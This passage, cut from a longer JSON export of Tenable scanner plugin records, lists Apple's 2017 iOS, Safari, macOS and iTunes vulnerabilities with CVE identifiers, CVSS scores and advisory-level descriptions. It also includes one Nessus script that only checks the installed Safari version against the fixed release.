It is, therefore, affected by multiple vulnerabilities in multiple components, the majority of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these remote code execution vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user. The affected components are as follows :\n\n - Accounts\n - Audio\n - Carbon\n - CoreGraphics\n - CoreText\n - DataAccess\n - FontParser\n - HomeKit\n - HTTPProtocol\n - ImageIO\n - iTunes Store\n - JavaScriptCore\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - libxslt\n - Pasteboard\n - Phone\n - Profiles\n - Quick Look\n - Safari\n - Safari Reader\n - SafariViewController\n - Security\n - Siri\n - WebKit\n - WebKit JavaScript Bindings\n - WebKit Web Inspector", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Apple iOS < 10.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", 
"CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-6976"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_103_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/99127", "sourceData": "Binary data apple_ios_103_check.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:13", "description": "Versions of Safari prior to 10.1 are affected by multiple vulnerabilities :\n\n - An unspecified state management flaw exists that may allow a context-dependent attacker to spoof the address bar. No further details have been provided. (CVE-2017-2376)\n - An unspecified flaw exists in the handling of HTTP authentication. This may allow a context-dependent attacker to display authentication sheets on arbitrary web sites and cause a denial of service. 
(CVE-2017-2389)\n\nAdditional flaws exist in the following components :\n\n - AutoFill (CVE-2017-2385)\n - CoreGraphics (CVE-2017-2444)\n - FaceTime (CVE-2017-2453)\n - Kernel (CVE-2017-2490)\n - WebKit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Safari < 10.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2386", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2490", "CVE-2017-2389", "CVE-2017-2453", "CVE-2017-2444", "CVE-2017-2378", "CVE-2017-2424", "CVE-2017-2385"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700033.PRM", "href": "https://www.tenable.com/plugins/nnm/700033", "sourceData": "Binary data 700033.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T13:44:37", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 10.1. 
It is, therefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds read error exists in WebKit when handling certain JavaScript code. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when handling certain regular expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to exhaust available memory resources. (CVE-2016-9643)\n\n - Multiple information disclosure vulnerabilities exist in WebKit when handling page loading due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to disclose data cross-origin. (CVE-2017-2364, CVE-2017-2367)\n\n - An unspecified state management flaw exists that allows an unauthenticated, remote attacker to spoof the address bar. (CVE-2017-2376)\n\n - A denial of service vulnerability exists in the Web Inspector component when closing a window while the debugger is paused. An unauthenticated, remote attacker can exploit this to terminate the application.\n (CVE-2017-2377)\n\n - An unspecified flaw exists in WebKit when creating bookmarks using drag-and-drop due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted link, to spoof bookmarks or potentially execute arbitrary code.\n (CVE-2017-2378)\n\n - An information disclosure vulnerability exists in the Login AutoFill component that allows a local attacker to access keychain items. (CVE-2017-2385)\n\n - Multiple information disclosure vulnerabilities exist in WebKit when handling unspecified exceptions or elements. An unauthenticated, remote attacker can exploit these, via specially crafted web content, to disclose data cross-origin. 
(CVE-2017-2386, CVE-2017-2479, CVE-2017-2480)\n\n - An unspecified flaw exists in the handling of HTTP authentication that allows an unauthenticated, remote attacker to disclose authentication sheets on arbitrary websites or cause a denial of service condition.\n (CVE-2017-2389)\n\n - Multiple memory corruption issues exist in WebKit that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2433, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in WebKit within the Web Inspector component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2405)\n\n - An unspecified type confusion error exists that allows an unauthenticated remote attacker to execute arbitrary code by using specially crafted web content.\n (CVE-2017-2415)\n\n - A security bypass vulnerability exists in WebKit that allows an unauthenticated, remote attacker to bypass the Content Security Policy by using specially crafted web content. (CVE-2017-2419)\n\n - An unspecified flaw exists in WebKit when handling OpenGL shaders that allows an unauthenticated, remote attacker to disclose process memory content by using specially crafted web content. (CVE-2017-2424)\n\n - An information disclosure vulnerability exists in WebKit JavaScript Bindings when handling page loading due to unspecified logic flaws. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2442)\n\n - A memory corruption issue exists in WebKit within the CoreGraphics component due to improper validation of certain input. 
An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frame objects due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions that are called from built-in strict mode scripts not being properly restricted from calling sensitive native functions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose memory contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in FaceTime prompt handling due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to spoof user interface elements. (CVE-2017-2453)\n\n - A use-after-free error exists in WebKit when handling RenderBox objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2463)\n\n - An unspecified use-after-free error exists in WebKit that allows an unauthenticated, remote attacker, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2471)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frames due to improper validation of certain input. 
An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2475)\n\n - A use-after-free error exists in WebKit when handling ElementData objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2481)\n\n - A use-after-free error exists in JavaScriptCore when handling the String.replace() method. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability exists in JavaScriptCore due to an unspecified prototype flaw. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2492)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-04-03T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 10.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2385", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2486", "CVE-2017-2491", 
"CVE-2017-2492", "CVE-2017-2493", "CVE-2017-7071"], "modified": "2019-07-03T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI10_1.NASL", "href": "https://www.tenable.com/plugins/nessus/99167", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99167);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/03 12:01:40\");\n\n script_cve_id(\n \"CVE-2016-9642\",\n \"CVE-2016-9643\",\n \"CVE-2017-2364\",\n \"CVE-2017-2367\",\n \"CVE-2017-2376\",\n \"CVE-2017-2377\",\n \"CVE-2017-2378\",\n \"CVE-2017-2385\",\n \"CVE-2017-2386\",\n \"CVE-2017-2389\",\n \"CVE-2017-2392\",\n \"CVE-2017-2394\",\n \"CVE-2017-2395\",\n \"CVE-2017-2396\",\n \"CVE-2017-2405\",\n \"CVE-2017-2415\",\n \"CVE-2017-2419\",\n \"CVE-2017-2424\",\n \"CVE-2017-2433\",\n \"CVE-2017-2442\",\n \"CVE-2017-2444\",\n \"CVE-2017-2445\",\n \"CVE-2017-2446\",\n \"CVE-2017-2447\",\n \"CVE-2017-2453\",\n \"CVE-2017-2454\",\n \"CVE-2017-2455\",\n \"CVE-2017-2457\",\n \"CVE-2017-2459\",\n \"CVE-2017-2460\",\n \"CVE-2017-2463\",\n \"CVE-2017-2464\",\n \"CVE-2017-2465\",\n \"CVE-2017-2466\",\n \"CVE-2017-2468\",\n \"CVE-2017-2469\",\n \"CVE-2017-2470\",\n \"CVE-2017-2471\",\n \"CVE-2017-2475\",\n \"CVE-2017-2476\",\n \"CVE-2017-2479\",\n \"CVE-2017-2480\",\n \"CVE-2017-2481\",\n \"CVE-2017-2486\",\n \"CVE-2017-2491\",\n \"CVE-2017-2492\",\n \"CVE-2017-2493\",\n \"CVE-2017-7071\"\n );\n script_bugtraq_id(\n 100613,\n 94554,\n 94559,\n 95725,\n 97129,\n 97130,\n 97131,\n 97133,\n 97136,\n 97140,\n 97143,\n 97147,\n 97176,\n 98316,\n 98700\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-2\");\n\n script_name(english:\"macOS : Apple Safari < 10.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple 
vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X \nhost is prior to 10.1. It is, therefore, affected by multiple\nvulnerabilities:\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - Multiple information disclosure vulnerabilities exist\n in WebKit when handling page loading due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to disclose data\n cross-origin. (CVE-2017-2364, CVE-2017-2367)\n\n - An unspecified state management flaw exists that allows\n an unauthenticated, remote attacker to spoof the address\n bar. (CVE-2017-2376)\n\n - A denial of service vulnerability exists in the Web\n Inspector component when closing a window while the\n debugger is paused. An unauthenticated, remote attacker\n can exploit this to terminate the application.\n (CVE-2017-2377)\n\n - An unspecified flaw exists in WebKit when creating\n bookmarks using drag-and-drop due to improper validation\n of certain input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted link, to spoof\n bookmarks or potentially execute arbitrary code.\n (CVE-2017-2378)\n\n - An information disclosure vulnerability exists in the\n Login AutofFill component that allows a local attacker\n to access keychain items. (CVE-2017-2385)\n\n - Multiple information disclosure vulnerabilities exist\n in WebKit when handling unspecified exceptions or\n elements. 
An unauthenticated, remote attacker can\n exploit these, via specially crafted web content, to\n disclose data cross-origin. (CVE-2017-2386,\n CVE-2017-2479, CVE-2017-2480)\n\n - An unspecified flaw exists in the handling of HTTP\n authentication that allows an unauthenticated, remote\n attacker to disclose authentication sheets on arbitrary\n websites or cause a denial of service condition.\n (CVE-2017-2389)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2433, CVE-2017-2454,\n CVE-2017-2455, CVE-2017-2459, CVE-2017-2460,\n CVE-2017-2464, CVE-2017-2465, CVE-2017-2466,\n CVE-2017-2468, CVE-2017-2469, CVE-2017-2470,\n CVE-2017-2476)\n\n - A memory corruption issue exists in WebKit within the\n Web Inspector component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2405)\n\n - An unspecified type confusion error exists that allows\n an unauthenticated remote attacker to execute arbitrary\n code by using specially crafted web content.\n (CVE-2017-2415)\n\n - A security bypass vulnerability exists in WebKit that\n allows an unauthenticated, remote attacker to bypass the\n Content Security Policy by using specially crafted web\n content. (CVE-2017-2419)\n\n - An unspecified flaw exists in WebKit when handling\n OpenGL shaders that allows an unauthenticated, remote\n attacker to disclose process memory content by using\n specially crafted web content. (CVE-2017-2424)\n\n - An information disclosure vulnerability exists in WebKit\n JavaScript Bindings when handling page loading due to\n unspecified logic flaws. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to disclose data cross-origin. 
(CVE-2017-2442)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in FaceTime prompt handling\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n spoof user interface elements. (CVE-2017-2453)\n\n - A use-after-free error exists in WebKit when handling\n RenderBox objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2463)\n\n - An unspecified use-after-free error exists in WebKit\n that allows an unauthenticated, remote attacker, via\n specially crafted web content, to dereference already\n freed memory, resulting in the execution of arbitrary\n code. 
(CVE-2017-2471)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw. An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207600\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6d82a85\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2378\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, 'Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '10.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, 
extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:37:14", "description": "The remote host is running a version of Mac OS X version 10.x prior to 10.12.4 , and is affected by multiple vulnerabilities :\n\n - A format string flaw exists that is triggered as string format specifiers (e.g. %s and %x) are not properly used when handling IPP(S) links. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2017-2403)\n - A flaw exists in the 'SecKeyRawVerify()' function that is triggered as parameters are not properly validated during the handling of cryptographic API call. This may allow a remote attacker to have an empty signature be accepted as valid. (CVE-2017-2423)\n - A type confusion flaw exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2430)\n - A use-after-free flaw exists in 'libc++' that is triggered when demangling C++ applications. This may allow a malicious application to dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2441)\n - A flaw exists as OTR packets are not properly validated. By spoofing the TLS/SSL server via a packet that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data. (CVE-2017-2448)\n - An overflow condition exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to cause a heap-based buffer overflow, potentially allowing execution of arbitrary code. 
(CVE-2017-2462)\n - An unspecified flaw exists that is triggered as certain input is not properly validated when parsing X.509 certificates. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2485)\n\nAdditional flaws exist in the following components :\n\n - AppleGraphicsPowerManagement (CVE-2017-2421)\n - AppleRAID (CVE-2017-2438)\n - Bluetooth (CVE-2017-2420, CVE-2017-2427, CVE-2017-2449)\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417)\n - CoreMedia (CVE-2017-2431)\n - CoreText (CVE-2017-2435, CVE-2017-2450, CVE-2017-2461)\n - EFI (CVE-2016-7585)\n - FinderKit (CVE-2017-2429)\n - FontParser (CVE-2017-2406, CVE-2017-2407, CVE-2017-2439, CVE-2017-2487)\n - Hypervisor (CVE-2017-2418)\n - iBooks (CVE-2017-2426)\n - IOATAFamily (CVE-2017-2408)\n - IOFireWireAVC (CVE-2017-2436, CVE-2017-2437)\n - IOFireWireFamily (CVE-2017-2388)\n - ImageIO (CVE-2017-2416, CVE-2017-2432, CVE-2017-2467)\n - Intel Graphics (CVE-2017-2443)\n - Kernel (CVE-2017-2398, CVE-2017-2401, CVE-2017-2410, CVE-2017-2440, CVE-2017-2456, CVE-2017-2472, CVE-2017-2473, CVE-2017-2474, CVE-2017-2478, CVE-2017-2482, CVE-2017-2483, CVE-2017-2489, CVE-2017-2490)\n - Keyboards (CVE-2017-2458)\n - libarchive (CVE-2017-2390)\n - libxslt (CVE-2017-2477)\n - MCX (CVE-2017-2402)\n - Menus (CVE-2017-2409)\n - Multi-touch (CVE-2017-2422)\n - nghttp2 (CVE-2017-2428)\n - QuickTime (CVE-2017-2413)\n - Security (CVE-2017-2451, CVE-2017-6974)\n - SecurityFoundation (CVE-2017-2425)\n - sudo (CVE-2017-2381)\n - WebKit (CVE-2017-2392, CVE-2017-2457, CVE-2017-2486)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Mac OS X 10.x < 10.12.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2392", "CVE-2017-2457", "CVE-2016-7585", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", 
"CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-6974", "CVE-2017-2486"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "700032.PRM", "href": "https://www.tenable.com/plugins/nnm/700032", "sourceData": "Binary data 700032.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:49", "description": "Versions of iTunes prior to 12.6 are affected by multiple vulnerabilities :\n\n - A use-after-free condition exists that is triggered when handling RenderBox objects. With specially crafted web content, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2463)\n - A flaw exists that allows a universal cross-site scripting (UXSS) attack. This flaw exists because the 'notifyChildNodeRemoved()' function in 'WebCore/dom/ContainerNodeAlgorithms.cpp' executes script code synchronously. This may allow a context-dependent attacker to create a specially crafted web page that executes arbitrary script code in a user's browser session within the trust relationship between their browser and any server. 
